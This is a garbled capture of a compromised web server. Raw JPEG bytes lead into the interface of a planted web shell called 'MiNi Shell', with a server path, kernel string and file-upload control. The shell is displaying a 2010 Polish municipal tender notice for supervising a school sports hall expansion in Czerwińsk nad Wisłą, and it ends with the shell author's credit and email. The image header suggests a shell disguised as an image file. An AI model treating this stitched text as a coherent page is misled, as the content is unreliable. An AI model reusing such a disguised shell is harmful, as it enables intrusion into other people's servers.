JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100908/283080-N-2010.html

<p class="kh_header"><b>Czerwińsk nad Wisłą: PEŁNIENIE NADZORU INWESTORSKIEGO nad realizacją zadania inwestycyjnego 
Rozbudowa i modernizacja Gminnego Zespołu Szkół w Czerwińsku nad Wisłą o halę sportową wraz z zespołem towarzyszącym</b><br>
<b>Numer ogłoszenia: 283080 - 2010; data zamieszczenia: 08.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czerwińsk nad Wisłą , ul. Wł. Jagiełły 16, 09-150 Czerwińsk nad Wisłą, woj. mazowieckie, tel. 024 2315075, faks 024 2315199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ugczerwinsk.bip.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE NADZORU INWESTORSKIEGO nad realizacją zadania inwestycyjnego 
Rozbudowa i modernizacja Gminnego Zespołu Szkół w Czerwińsku nad Wisłą o halę sportową wraz z zespołem towarzyszącym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest PEŁNIENIE NADZORU INWESTORSKIEGO nad realizacją zadania  inwestycyjnego Rozbudowa i modernizacja Gminnego Zespołu Szkół w Czerwińsku nad Wisłą o halę sportową wraz z zespołem towarzyszącym
Pełnienie nadzoru obejmuje:
1. pełny zakres ujęty w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 z poźn. zm.), tj.:
a) reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej,
b) sprawdzanie jakości wykonywanych robot i wbudowanych wyrobów budowlanych, a w szczególności
zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,
c) sprawdzanie i odbiór robot budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania,
d) potwierdzanie faktycznie wykonanych robot oraz usunięcia wad, a także, na żądanie inwestora, kontrolowanie rozliczeń budowy,
2. bezzwłoczne informowanie Zamawiającego o zmianach lub konieczności wykonania robót mogących mieć skutki ekonomiczne dla Zamawiającego,
3. bieżące kontrolowanie prowadzenia inwestycji zgodnie z warunkami umowy zawartej pomiędzy wykonawcą robót a inwestorem (Zamawiającym) potwierdzane wpisami w dzienniku budowy,
4. prowadzenie bieżącej kontroli zgodności realizacji z harmonogramem rzeczowo-finansowym,
5. zgłaszanie projektantowi, w porozumieniu z Zamawiającym, zastrzeżeń do projektu sygnalizowanych przez wykonawcę robót lub Zamawiającego i dokonywanie z nim stosownych uzgodnień lub wyjaśnień,
6. udział w czynnościach odbioru końcowego, w czynnościach odbiorów częściowych oraz w czynnościach odbiorów robót ulegających zakryciu inwestycji określonych w umowie z wykonawcą wraz z ich rozliczeniem - w ramach tych czynności Wykonawca zobowiązuje się do:
a) stwierdzenia gotowości do odbioru końcowego i odbiorów częściowych,
b) udziału w czynnościach odbioru końcowego oraz w czynnościach odbiorów częściowych od wykonawcy robót oraz przekazania przedmiotu odbioru Zamawiającemu lub wyznaczonemu przez niego użytkownikowi,
c) przekazania Zamawiającemu protokołów odbioru,
7. wypełnianie przez Wykonawcę obowiązków związanych z realizacją inwestycji tj.: przerwanie, inwentaryzacja, itp.
8. uczestnictwo w naradach koordynacyjnych a także innych na wezwanie Zamawiającego,
9. uczestnictwo w radach budowy.
Nadzór inwestorski pełniony będzie nad poszczególnymi etapami zadania inwestycyjnego:

Rok 2010

a) I etap zadania inwestycyjnego  obejmuje wykonanie następujących elementów prac: 
    zakończenie realizacji I etapu do 30 listopada 2010 roku
1. Roboty budowlano-montażowe 

Lp. 	Wyszczególnienie rodzaju robót 
1. 	Przygotowanie terenu i roboty rozbiórkowe zewnętrzne (bez opłat za wycinkę drzew) 
2. 	Roboty rozbiórkowe wewnętrzne i uzupełniające 
3.	Roboty ziemne 
4. 	Ławy fundamentowe 
5.	Stopy fundamentowe 
6. 	Zbrojenie ław i stóp fundamentowych 
7. 	Izolacje p-w i cieplne ław i stóp fundamentowych 
8. 	Ściana oporowa przy wejściu do kotłowni  
9. 	Płyty PZ-1, PZ-2, DW-1 
10.	Podciągi P1, P2,P2,P3,P4,P5,P6 
11. 	Słupy i rdzenie żelbetowe  
12.	Płyty stropowe i wieńce - parter
13.	Płyty stropowe i wieńce - piętro   
14.	Wieńce W1, W1A, W1B 
15.	Płyty widowni  
16.	Nadproża N4.7,N1.6,N16a,N15,N1.1,N1.8,N3.1  
17.	Podciągi, słupy stalowe, tężniki pionowe i poziome 
18. 	Schody SchW-3   
19. 	Schody SchW-1 
20.	Schody SCH1 szt.2   
21. 	Schody SchW-2  
22.	Ściany i ścianki działowe  
23.	Konstrukcja z drewna klejonego 
24.	Stropodach nad salą sportową 
25.	Stropodach nad zespołem towarzyszącym 
26.	Konstrukcja drewniana dachu  
27.	Pokrycie dachu nad poddaszem nieużytkowym  
28. 	Kominy 

Rok 2011

b) II etap  zadania inwestycyjnego obejmuje wykonanie następujących elementów prac: 
    zakończenie realizacji II etapu do 30 listopada 2011 roku
1. Roboty budowlano-montażowe 

I. Realizacja od 02.01.2011r. do 31.03.2011 r. 
  1. Roboty budowlano-montażowe 

Lp. 	Wyszczególnienie rodzaju robót 
1. 	Ścianki wewnętrzne aluminiowe 
2.	Tynki i okładziny wewnętrzne    


II. Realizacja  od 01.04.2011r. do 30.06.2011 r. 
  1. Prace instalacyjne 


1.	Instalacja wod.kan. część istniejąca 
2.	Instalacja wod.kan. część projektowana   
3.	Zewnętrzna kanalizacja sanitarna  
4.	Instalacja wentylacji sali gimnastycznej 
5.	Instalacja wentylacji zaplecza  


III. Realizacja  od 01.07.2011 r. do 30.11.2011 r. 
  1. Roboty budowlano-montażowe  i prace instalacyjne

Lp. 	Wyszczególnienie rodzaju robót 
1.	Kotłownia  
2.	Instalacja c.o. część starej szkoły 
3. 	Instalacja c.o. część nowa szkoły
4. 	Węzeł cieplny 
5.	Instalacje elektryczne 
6.	Roboty remontowe w kotłowni 
7.	Posadzki 
8. 	Stolarka okienna i parapety wewnętrzne 
9.	Drzwi wewnętrzne i zewnętrzne 
10.	Obróbki blacharskie 


Rok 2012


c) III etap  zadania inwestycyjnego obejmuje wykonanie następujących elementów prac: 
    zakończenie realizacji III etapu do 30 października  2012 roku

I. Realizacja  od 02. 01. 2012 r. do 30.06.2012 r. 
  1. Roboty budowlano-montażowe 

11. 	Ścianki szklane zewnętrzne aluminiowe systemowe 
12. 	Roboty malarskie  
13.	Elewacja rozbudowy i części przebudowywanej     
14. 	Okładziny zewnętrzne i wycieraczki  
15.	Balustrady  



II. Realizacja  od 01.07.2012r. do 31.10.2012 r. 
  1. Wyposażenie  

1. 	Wyposażenie  
1.1. 	Wyposażenie hali sportowej  
1.2.	Wyposażenie przebieralni     
1.3. 	Wyposażenie  siłowni    
1.4.	Pozostały sprzęt gimnastyczny
1.5.	Wyposażenie sali ćwiczeń korekcyjnych
1.6.	Pozostałe wyposażenie obiektu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa art.22 ust 1 ustawy Prawo Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresach ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) pełnił (tj. zakończył):
a) co najmniej dwa nadzory inwestorskie w branży konstrukcyjno-budowlanej nad budową wielofunkcyjnego obiektu sportowego o kubaturze co najmniej 18 000 m3 każdy,
b) co najmniej dwa nadzory inwestorskie w branży sanitarnej o wartości dla  każdego wykonanego zadania  (branży sanitarnej) co najmniej  500 000,00  PLN (pięćset tysięcy  PLN),
c) co najmniej dwa nadzory inwestorskie w branży elektrycznej o wartości dla każdego wykonanego zadania (branży elektrycznej) co najmniej 300 000,00 PLN(trzysta tysięcy PLN).
UWAGA:
Za usługę wykonaną Zamawiający uzna taką usługę, którą Wykonawca wykonał w całości i załączył dokument potwierdzający, że usługa została wykonana należycie, lub w przypadku usługi wykonywanej okres jej wykonywania przekroczył połowę czasu określonego na jej wykonanie w zawartej umowie i załączy dokument potwierdzający, że usługa wykonywana jest należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca zobowiązany jest wykazać, że dysponuje osobami posiadającymi uprawnienia do wykonania zamówienia, o których mowa w art. 12 ust. 1 punkt 4 Ustawy z dnia 7 lipca 1994r. Prawo budowlane</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca zobowiązany jest wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 50 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.1 Oświadczenia, że Wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 1-4 ustawy Pzp -
potwierdzającego spełnienie warunku określonego w rozdziale V, pkt 1.b SIWZ. Niniejsze oświadczenie winno być sporządzone zgodnie z treścią Załącznika Nr 2 do SIWZ. Zabronione jest wprowadzanie jakichkolwiek zmian w treści załącznika.
1.2 Wykazu wykonanych usług w zakresie  niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia  działalności jest krótszy - w tym okresie, z podaniem  ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumentów potwierdzających, ze usługi wymienione w wykazie  zostały wykonane należycie. Niniejszy wykaz winien być zgodnym z treścią Załącznika Nr 4 do SIWZ. Zabronione jest wprowadzanie jakichkolwiek zmian w treści załącznika.
1.3 Oświadczenie potwierdzające że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia budowlane, o których mowa  w art. 12 ust. 1 punkt 4)  Ustawy z dnia 7 lipca 1994 r. Prawo Budowlane  (Dz.U. z 2006 r.  Nr 156, poz. 1118 z późn. zmianami).  Niniejsze oświadczenie winno być sporządzone zgodnie z treścią Załącznika Nr 5 do SIWZ. Zabronione jest wprowadzanie jakichkolwiek zmian w treści załącznika.
1.4 opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że  wykonawca  jest ubezpieczony  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia. 
2. W celu wykazania braku podstaw do wykluczenia Wykonawcy z postępowania o udzielnie zamówienia Zamawiający żąda złożenia następujących dokumentów:
2.1 Oświadczenia o braku podstaw do wykluczenia. Niniejsze oświadczenie winno być sporządzone zgodnie z treścią Załącznika Nr 3 do SIWZ. Zabronione jest wprowadzanie jakichkolwiek zmian w treści załącznika,
2.2 Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych
oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy - Załącznik Nr 7 do SIWZ.
UWAGA:
W stosunku do osób fizycznych zamiast oświadczenia w zakresie art.24 ust.1 pkt 2 ustawy Pzp - za wystarczające uzna się złożenie oświadczenia, o którym mowa w rozdz. VI pkt 2.1 SIWZ, który w swej treści odnosi się do art.24 ust.1 pkt 2 ustawy Pzp.
3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu wymienionego w rozdz. VI pkt 2.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu, o którym mowa powyżej - zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
4.1 Oświadczenie wymienione w pkt VI.1.1 SIWZ w zakresie: art. 22 ust, 1 pkt 1-4 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wspólnie (przez umocowanego Pełnomocnika) potwierdzając, iż określone przez Zamawiającego warunki spełniają razem.
4.2 Dokumenty wymienione w pkt VI.1.2.-VI.1.3. SIWZ winien przedłożyć jeden albo więcej Wykonawców wspólnie ubiegających się o udzielenie zamówienia tak, aby potwierdzić łączne spełnianie warunku, którego dotyczy.
4.3 Dokument wymieniony w pkt VI.2.2 SWIZ winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna tak, aby samodzielnie potwierdzić brak podstaw do wykluczenia z postępowania o udzielenie zamówienia.
4.4 Oświadczenie wymienione w pkt VI.2.1 SIWZ winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna, tak aby samodzielnie potwierdzić brak podstaw do wykluczenia z postępowania o udzielenie zamówienia. Zamawiający dopuszcza, aby niniejszy dokument został złożony wspólnie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, lecz w takiej sytuacji na niniejszym dokumencie wymagany jest podpis uprawnionego przedstawiciela każdego Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w okolicznościach, których nie można było przewidzieć w chwili zawierania umowy, w szczególności:
1) wprowadzenia urzędowej zmiany stawki podatku VAT, co spowoduje zmianę wynagrodzenia brutto Wykonawcy,
2) konieczności wprowadzenia wszelkich zmian z inicjatywy podmiotu współfinansującego zadanie.
4. Ww. zmiany umowy mogą być dokonane wyłącznie w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ugczerwinsk.bip.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Czerwińsk nad Wisłą, ul. Wł. Jagiełły 16, 09-150 Czerwińsk nad Wisłą..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2010 godzina 09:00, miejsce: Urząd Gminy Czerwińsk nad Wisłą, ul. Wł. Jagiełły 16, 09-150 Czerwińsk nad Wisłą, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013, priorytet VII - Tworzenie i poprawa warunków rozwoju kapitału ludzkiego Działanie 7.2 Infrastruktura służąca edukacji..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com